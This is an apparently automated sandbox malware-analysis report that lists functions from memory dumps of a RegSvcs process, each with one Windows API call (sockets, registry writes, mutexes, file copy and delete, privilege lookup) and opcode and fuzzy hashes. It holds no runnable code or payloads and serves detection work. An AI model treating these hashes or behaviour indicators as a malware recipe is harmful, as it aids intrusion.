Function 0018A120, Relevance: 1.6, APIs: 1, Instructions: 84networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(?,00000E40,?,?), ref: 0018A1C2

Memory Dump Source

Source File: 00000008.00000002.671207513.000000000018A000.00000040.00000001.sdmp, Offset: 0018A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a000_RegSvcs.jbxd

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 9ad5679e037851b3e36398e5bbaf374714a0776c1ff8ef9a6144695cfd018cbe
Instruction ID: 45d35234a00efd83f4f4610f1de0f24ce409f7359a44f7768a899dac767f6664
Opcode Fuzzy Hash: 9ad5679e037851b3e36398e5bbaf374714a0776c1ff8ef9a6144695cfd018cbe
Instruction Fuzzy Hash: 7F31D67140D3C16FD3038B359C55B66BFB4EF47620F1981CBD8848F293D229A919CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 004D3052, Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000E40), ref: 004D30F7

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: 7afe31589d2b3b1593d7263fa24c5cbcfa6a1fba8e3ff51286dbd2d03d635aa9
Instruction ID: a5102fa56cf39e3c95f89fee29b60ab540411460555145fb3dd87125d469b47f
Opcode Fuzzy Hash: 7afe31589d2b3b1593d7263fa24c5cbcfa6a1fba8e3ff51286dbd2d03d635aa9
Instruction Fuzzy Hash: 9221D171100301AFFB21DF55DC85FAAF7ACEB04710F0049ABFA489A281D675AA45CB71

Uniqueness

Uniqueness Score: -1.00%

Function 004D22C4, Relevance: 1.6, APIs: 1, Instructions: 80fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE ref: 004D2366

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 4bc7a128658e2c391ec8bcddcd250652fe54b3fe67e081e13325a4d27c0a179f
Instruction ID: abaf574ca639408b33de7c7d55a658313607076ee6ce5e5584d0f12a7f69fa5b
Opcode Fuzzy Hash: 4bc7a128658e2c391ec8bcddcd250652fe54b3fe67e081e13325a4d27c0a179f
Instruction Fuzzy Hash: 78219E72504384AFE722CB55DC45F96FFF8EF0A310F0485AEE9888B252D375A908CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004D0EDE, Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNEL32(?,00000E40), ref: 004D0F5B

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a951bb114357c74f276e1e1f7fccc9e06b36386671d1da7ca033cc24043275ee
Instruction ID: cf182b474eaa2709bdc5e0816c8533741658a76f9faf8a9f506a38e804a19af9
Opcode Fuzzy Hash: a951bb114357c74f276e1e1f7fccc9e06b36386671d1da7ca033cc24043275ee
Instruction Fuzzy Hash: A921B072500304AFFB218F65DC44F6AFBACEF04320F14896BE9458B641D674E9459BA1

Uniqueness

Uniqueness Score: -1.00%

Function 004D02AB, Relevance: 1.6, APIs: 1, Instructions: 79registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(?,00000E40), ref: 004D0353

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 3dbcdf97f4b1e324b71225af507720ce850fc7e117582e1fea4d1cf1f53a0809
Instruction ID: 347bde3ee9d9a748d14481fd086e4b674352e4b8ecf928ec2460e8aba61512f9
Opcode Fuzzy Hash: 3dbcdf97f4b1e324b71225af507720ce850fc7e117582e1fea4d1cf1f53a0809
Instruction Fuzzy Hash: F421B575009780AFE7228F11DC45FA6FFB4EF06310F0885DBE9848B1A2D275A949DB75

Uniqueness

Uniqueness Score: -1.00%

Function 004D08F0, Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E40,978F22E5,00000000,00000000,00000000,00000000), ref: 004D0985

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 90e4c06e11814135f22126a4045ca0bc2d2535e94d304068c89e619148bb9476
Instruction ID: 2a1b8c83dd8c60337105515b62ebdfe10206b03361b60b053e87463e8c10fcf1
Opcode Fuzzy Hash: 90e4c06e11814135f22126a4045ca0bc2d2535e94d304068c89e619148bb9476
Instruction Fuzzy Hash: F6210AB6408784AFF712CB159C54BA3BFB8EF46720F0881DBE9848B293D224A905C775

Uniqueness

Uniqueness Score: -1.00%

Function 004D1A72, Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 004D1AFE

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 6b58ec7f24902a9180cab99a513cf077fb81ab39c36d8df6e68a5df7252ff513
Instruction ID: f677bb3608451d3660d7ff16e9a4ef290817b4b25f794deb70f486c9ec61a891
Opcode Fuzzy Hash: 6b58ec7f24902a9180cab99a513cf077fb81ab39c36d8df6e68a5df7252ff513
Instruction Fuzzy Hash: 4321AD71505380AFE722CF55DC44F96FFF8EF09320F08849EE9898B692D275A918CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004D05B0, Relevance: 1.6, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(?,00000E40,?,?), ref: 004D064E

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 5ce647ca6011954011da7a157c27f02b47273bc5f4c8db59b26b7a3a4df75319
Instruction ID: 943fac0ae8fac6acbe9c794f84f2b0cdfdf57f86c580ccd7987253fafe6fd3f0
Opcode Fuzzy Hash: 5ce647ca6011954011da7a157c27f02b47273bc5f4c8db59b26b7a3a4df75319
Instruction Fuzzy Hash: 6E21AF7140E3C06FD3128B259C65B62BFB4EF47610F1981CBD8848F6A3D225A919C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 004D081A, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 004D0899

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 19920fc900e2a79a95f1949c32a5add9cd3f975fb2fa635e9fc421c5904ffb57
Instruction ID: 7e2ffb486e1a5c8563685aa049b923894881572a77c3c487530637ab8af88e80
Opcode Fuzzy Hash: 19920fc900e2a79a95f1949c32a5add9cd3f975fb2fa635e9fc421c5904ffb57
Instruction Fuzzy Hash: 64217A71500300AFFB20DF65DC45B6AFBE8EF08310F14846AE9898B752D375E904DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004D0B79, Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNEL32(?,00000E40,978F22E5,00000000,00000000,00000000,00000000), ref: 004D0C10

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 0a187d7df9584c8e37f8e7242558a723b2724aecf5fd256e0d0ddef4f3590767
Instruction ID: a48a8b82c460874b94143e8c8219b330dcc76dff84580563349196acdb95f50c
Opcode Fuzzy Hash: 0a187d7df9584c8e37f8e7242558a723b2724aecf5fd256e0d0ddef4f3590767
Instruction Fuzzy Hash: D0219DB2504740AFE7218B15DC85F67BFB8EF05710F08859BE9899B292D264E908CB75

Uniqueness

Uniqueness Score: -1.00%

Function 004D03CA, Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(?,00000E40), ref: 004D045E

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 3b343760ee14b402a1362b3e7f902eadb2d25e27d978dd12dbfff811ce3d2774
Instruction ID: 93294f8df37e3db095f6a6a9bdc5c207e459033e9ffb8219c75fa05156eaab41
Opcode Fuzzy Hash: 3b343760ee14b402a1362b3e7f902eadb2d25e27d978dd12dbfff811ce3d2774
Instruction Fuzzy Hash: F321D071100300AFFB21DF15DC84FB6FBA8EB04310F00855AEA498A281D6B5A9499BB1

Uniqueness

Uniqueness Score: -1.00%

Function 004D09C0, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000E40,978F22E5,00000000,00000000,00000000,00000000), ref: 004D0A51

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 45d83a46d3c4bc49bfd9c6d1188bb80d80e3148652794a8c176ae7d3da96e6f4
Instruction ID: c51f2b56a0d3d34bfdba062c67d9c23f87510ebc3a5ae5972419236f0c3c582d
Opcode Fuzzy Hash: 45d83a46d3c4bc49bfd9c6d1188bb80d80e3148652794a8c176ae7d3da96e6f4
Instruction Fuzzy Hash: C2219271509380AFE722CB55DC44F66BFB8EF46314F0885DBE9488B253C225A909CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0018AA32, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E40), ref: 0018AAB1

Memory Dump Source

Source File: 00000008.00000002.671207513.000000000018A000.00000040.00000001.sdmp, Offset: 0018A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a000_RegSvcs.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 8268fa836b3810e515d074a837efe02424a90c93af2068416ffcb85233b5cb23
Instruction ID: bb308d579af37f656dce53d8f8c6741ba85173e2ec87a5be9764907e104d07fb
Opcode Fuzzy Hash: 8268fa836b3810e515d074a837efe02424a90c93af2068416ffcb85233b5cb23
Instruction Fuzzy Hash: D2219D72500304ABF721DF55DD84FAAFBACEF04310F04855BE9458B641D674EA48CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 004D012A, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 004D019D

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 698a964f86adf8580b3005141735a41dd6071502999449a23f69cda6cc9c7323
Instruction ID: 73d9403596b28c7fd2566cabec232f91558cb5ed9eb1f7512bdd9ebf5966deac
Opcode Fuzzy Hash: 698a964f86adf8580b3005141735a41dd6071502999449a23f69cda6cc9c7323
Instruction Fuzzy Hash: 67217971600300AFF720CF65DC85B6AFBE8EF09360F0484ABE9488B341E675E904CA65

Uniqueness

Uniqueness Score: -1.00%

Function 004D0723, Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,?), ref: 004D079F

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 8fe342634fec30d44e65ef80a8c4a31675c2ca53bcc7f3f9a2786a4fc11d55ef
Instruction ID: 8f219f6ac348aee327c854cc1329cfdb66663ee618dd72f45499181b171fce2c
Opcode Fuzzy Hash: 8fe342634fec30d44e65ef80a8c4a31675c2ca53bcc7f3f9a2786a4fc11d55ef
Instruction Fuzzy Hash: 22217F765093809FE711CB25DC55B96BFE8EF06210F0984EBE949CF253E234E908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 004D0A9B, Relevance: 1.6, APIs: 1, Instructions: 71fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,?,?), ref: 004D0B1E

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 8341d55f78ef0c08093f56926e2c39b6aa3521c6a0ddae02471b770b2a8b90b6
Instruction ID: 3b0140db4c13c40129d6ab1c0fa14aee2549f68260563641a92fcab3ecf1c216
Opcode Fuzzy Hash: 8341d55f78ef0c08093f56926e2c39b6aa3521c6a0ddae02471b770b2a8b90b6
Instruction Fuzzy Hash: 342183B16093805FE712CB65DC55B53BFA8EF16314F0881DBE984CB253D225E804C771

Uniqueness

Uniqueness Score: -1.00%

Function 004D10BF, Relevance: 1.6, APIs: 1, Instructions: 71fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNELBASE(?,00000E40), ref: 004D114B

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 3f3e1e45bb7abdd894c33a52d2ee0202f426007f1add856a39706fa538b7467f
Instruction ID: e9a7344e5d45ec7b0a1509b0644063eec774543085cc0459b15f7112bd5d128a
Opcode Fuzzy Hash: 3f3e1e45bb7abdd894c33a52d2ee0202f426007f1add856a39706fa538b7467f
Instruction Fuzzy Hash: E021D571604380BFE721CB15DC45FA6FFA8EF05720F14819AFD488B292D265A948CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0018AB3A, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E40,978F22E5,00000000,00000000,00000000,00000000), ref: 0018ABB4

Memory Dump Source

Source File: 00000008.00000002.671207513.000000000018A000.00000040.00000001.sdmp, Offset: 0018A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a000_RegSvcs.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 54cc687baad4227a5f5910ff7bbf43a8c3a1e77a86a3971a3818f77e45d84279
Instruction ID: 103d5cf2f78a77ddcaf3a7080a5cdbc4085a33ed42910ad307754f0b087ad35a
Opcode Fuzzy Hash: 54cc687baad4227a5f5910ff7bbf43a8c3a1e77a86a3971a3818f77e45d84279
Instruction Fuzzy Hash: 95216A76600304AFF720DE15DC84F66FBE8EF04710F4885AAE9498A251D770EA48DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 004D21F2, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 004D225D

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 8c16274bb3c8d6e521ba397aabb9f806e3f4dba1d041bd59f5bb7566df9a44b3
Instruction ID: 39cef07f82baf787cd9bceabe4128c12777bf28eed5cb8172c802d11c7fe4990
Opcode Fuzzy Hash: 8c16274bb3c8d6e521ba397aabb9f806e3f4dba1d041bd59f5bb7566df9a44b3
Instruction Fuzzy Hash: B1219A71500300AFFB20CB65DD85B6AFBE8EB18320F1484AAE9488B741D2B5E905CA66

Uniqueness

Uniqueness Score: -1.00%

Function 004D15E5, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32 ref: 004D1656

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: 745533594d93c317aa70d2e1edf8118f75f9b6d2479dc4dc2f2d46dda7a8aa3e
Instruction ID: 06d39c9a812a679e248a71be86bddd012dd22b39d4b41d23eba2df14058e525d
Opcode Fuzzy Hash: 745533594d93c317aa70d2e1edf8118f75f9b6d2479dc4dc2f2d46dda7a8aa3e
Instruction Fuzzy Hash: D62180715093809FD712CB25DC54B92BFE4EF06320F0984EBE984CB263D234E908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 004D22F2, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE ref: 004D2366

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 897254c07d3175672c9989e3f4aa66ef64fdaa6016baef6056cf8aa3ed61313c
Instruction ID: 53695ea7abf853fdd7123308cd1cd9a5e18a5abd671a450d37de505d37cd87a7
Opcode Fuzzy Hash: 897254c07d3175672c9989e3f4aa66ef64fdaa6016baef6056cf8aa3ed61313c
Instruction Fuzzy Hash: E8219D71500304EFF721CF65DD45BAAFBE8EF08310F0485AEE9898B241D279E905DB66

Uniqueness

Uniqueness Score: -1.00%

Function 004D1A92, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 004D1AFE

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 46d450dcbb7caf0f2158ad6684859fa704fda5dcdccd851702b82f153a49e654
Instruction ID: ab661040f60c650dcc1b50ef150cb588bd223e9ebd60ef63ba4851603e936613
Opcode Fuzzy Hash: 46d450dcbb7caf0f2158ad6684859fa704fda5dcdccd851702b82f153a49e654
Instruction Fuzzy Hash: 0021CD71501300AFFB21CF54DC44B6AFBE4EF08320F0484ABEE498A651D275A914DB66

Uniqueness

Uniqueness Score: -1.00%

Function 004D04EA, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E40,978F22E5,00000000,00000000,00000000,00000000), ref: 004D055C

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: d718ed473a65e191b2996b5c6c36b5db1eb0ef32b4292f4b9a98f719f9fab4e1
Instruction ID: 93b6664e8c5180725ea173d0b9bda3253771816644489adc2c9ddfb5452dc00b
Opcode Fuzzy Hash: d718ed473a65e191b2996b5c6c36b5db1eb0ef32b4292f4b9a98f719f9fab4e1
Instruction Fuzzy Hash: 26119A72500700AFEB20CE15EC94F67FBA8EB04720F04859BED4A8B341D664E944DAB5

Uniqueness

Uniqueness Score: -1.00%

Function 004D0B9E, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNEL32(?,00000E40,978F22E5,00000000,00000000,00000000,00000000), ref: 004D0C10

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: e833c77b750fc9f872a33b733506711689d2dccdb9b3ca6e6721b0b022793651
Instruction ID: 5af47f53a90675769771d79b027c01de804bd0264f6fcb35c55a2d26a82b4dcc
Opcode Fuzzy Hash: e833c77b750fc9f872a33b733506711689d2dccdb9b3ca6e6721b0b022793651
Instruction Fuzzy Hash: F711BB72600300AFEB208F15DC85F6BFBA8EF04710F04869BE9498B341D674E845DAB6

Uniqueness

Uniqueness Score: -1.00%

Function 004D275E, Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNELBASE(?,00000E40,978F22E5,00000000,00000000,00000000,00000000), ref: 004D27BD

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: b7d6f9f3fdfacd787aad0ce8204f5ddb5b676ba93f726a49f4fd13ae82b6a27b
Instruction ID: fef07786b8cdf3270a7899a7fc980283303e11d6c929aca5d1bdeab6fd9b2f2a
Opcode Fuzzy Hash: b7d6f9f3fdfacd787aad0ce8204f5ddb5b676ba93f726a49f4fd13ae82b6a27b
Instruction Fuzzy Hash: 1B11E272500300EFFB20CF55DD45F6AFBA8EF14320F1485ABE9098A641D674E9449BB5

Uniqueness

Uniqueness Score: -1.00%

Function 004D12F8, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 004D1362

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: ce10392b9b1bd2c7d9ea3e201d577d470ae4ea5dcf744bfbd316ede1b1ddd068
Instruction ID: 763bac369eac4d63f22b0095a06299ff12f43604e1ec042eb466b04e503491f0
Opcode Fuzzy Hash: ce10392b9b1bd2c7d9ea3e201d577d470ae4ea5dcf744bfbd316ede1b1ddd068
Instruction Fuzzy Hash: 31116072605380AFE711CF25DC95B57BFE8EF45210F0884ABED49CB662D234E814CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0018A51F, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 0018A58A

Memory Dump Source

Source File: 00000008.00000002.671207513.000000000018A000.00000040.00000001.sdmp, Offset: 0018A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a000_RegSvcs.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: b91611132f4ff1d2f13cefb6efa303f52c0d38f4e56e488600a2549a884718dd
Instruction ID: ef53281c028916da6d4357a4d79a511002c6954aae0ad6e0c5118d53351f5cad
Opcode Fuzzy Hash: b91611132f4ff1d2f13cefb6efa303f52c0d38f4e56e488600a2549a884718dd
Instruction Fuzzy Hash: 7311A272409780AFDB228F50DC44B62FFF4EF4A320F08859AED898B152C335A518DB61

Uniqueness

Uniqueness Score: -1.00%

Function 0018B7CA, Relevance: 1.6, APIs: 1, Instructions: 61windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 0018B841

Memory Dump Source

Source File: 00000008.00000002.671207513.000000000018A000.00000040.00000001.sdmp, Offset: 0018A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a000_RegSvcs.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: cc695752fd11d83e871a8b47d8a9b94f687d4a976a1053c9b054ce602513f127
Instruction ID: d2c39c2f70b78a02a791d9a10b8702486983169a132a50a94271dd0ede79fba2
Opcode Fuzzy Hash: cc695752fd11d83e871a8b47d8a9b94f687d4a976a1053c9b054ce602513f127
Instruction Fuzzy Hash: 182190725097C09FDB128B21DC54AA1BFB4EF17310F0D84DAEDC44F163D265A958DB61

Uniqueness

Uniqueness Score: -1.00%

Function 004D1006, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetExitCodeProcess.KERNELBASE(?,00000E40,978F22E5,00000000,00000000,00000000,00000000), ref: 004D105C

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: CodeExitProcess
String ID:
API String ID: 3861947596-0
Opcode ID: dbe43a68a474d901ab2d0dfd6c5607e147ce6f14c4c839ea33bdd911b6775d4c
Instruction ID: 6606af409dfe03c53de125019c4e399a446f76e9a0c470da71425839dccb4be8
Opcode Fuzzy Hash: dbe43a68a474d901ab2d0dfd6c5607e147ce6f14c4c839ea33bdd911b6775d4c
Instruction Fuzzy Hash: 4411E371500340AFFB11DF15DC85B7AFB98EF44320F1484ABED09CB681D678E9448AA5

Uniqueness

Uniqueness Score: -1.00%

Function 004D02DE, Relevance: 1.6, APIs: 1, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(?,00000E40), ref: 004D0353

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a016d29b7abac253a917913725d4b22158b90c528ea86c472d17bef6a9612468
Instruction ID: 8bc910e816bc5abfd594ebf87055bd5a77cd4341b1c9e0bd45896a178be291da
Opcode Fuzzy Hash: a016d29b7abac253a917913725d4b22158b90c528ea86c472d17bef6a9612468
Instruction Fuzzy Hash: D8110131100300EFFB318F01DC41F7AFBA8EF04710F14859BEE484A291C2B5A948DAB6

Uniqueness

Uniqueness Score: -1.00%

Function 004D10E2, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNELBASE(?,00000E40), ref: 004D114B

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: a684f2882a411e3c2d13c8d0d7752655fb4d9781a4a49555750bb40491e66792
Instruction ID: c63c4ed261f36df408e13a24dc0f8f7253e1beb6e947a11bd57bcf95d1218843
Opcode Fuzzy Hash: a684f2882a411e3c2d13c8d0d7752655fb4d9781a4a49555750bb40491e66792
Instruction Fuzzy Hash: D611E971600300BFF720DB15DC85BBAFB98DF04720F14809BFE098A391D6B5A945CA65

Uniqueness

Uniqueness Score: -1.00%

Function 004D09F2, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000E40,978F22E5,00000000,00000000,00000000,00000000), ref: 004D0A51

Memory Dump Source

